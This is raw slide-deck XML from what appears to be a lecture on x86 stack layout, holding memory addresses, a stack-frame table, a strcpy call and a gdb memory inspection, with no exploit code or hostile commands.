              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771233" y="223998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 name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4120587" y="4722471"/>
            <a:ext cx="4884517" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) x/x 0xbffff738</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xbffff738:	0xbffff87b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="510428210"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff87b</a:t>
                      </a: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215</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="650654220"/>
              </p:ext>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0xbffff87b</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0xbffff65c</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804840f</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="249241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 name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4120587" y="4722471"/>
            <a:ext cx="4884517" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) x/x 0xbffff738</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xbffff738:	0xbffff87b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff660</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1310115246"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff87b</a:t>
                      </a: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216</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="644892215"/>
              </p:ext>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0xbffff666</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0xbffff65c</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0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048412</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
